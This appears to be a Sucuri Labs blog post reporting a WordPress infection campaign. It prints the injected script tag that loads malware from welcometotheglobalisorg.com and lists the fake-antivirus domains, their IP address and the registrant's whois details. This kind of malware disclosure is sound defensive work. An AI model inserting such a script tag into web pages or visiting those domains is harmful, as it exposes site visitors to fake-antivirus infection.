Hilary Kneber Again – welcometotheglobalisorg

We are seeing (again) a number of sites infected with a variation of the welcometotheglobalisnet.com malware string that appeared a few weeks ago.

The details are the same as in the previous post except that now they are using welcometotheglobalisorg.com (note the org instead of net) to spread the malware.

The infected sites have the following javascript added to all their posts (generally affecting WordPress):

<script src "http://welcometotheglobalisorg.com/js.php?kk=26′></script>


Shameless plug: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

What happens when someone clicks an infected site?

What the malware does is very simple, it contacts a few domains (all in the IP address 65.23.153.126):

antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc

It will then try to infect the visitor via their browser (with a fake anti virus). We are still analyzing the infected sites, and we’ll post more details as they’re discovered.

Here is the whois for the group responsible:

Registrant Contact:
HardSoft, inc
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Technical Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Those domains are not blacklisted (by Google or Norton), so the risk of infection is high.

If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.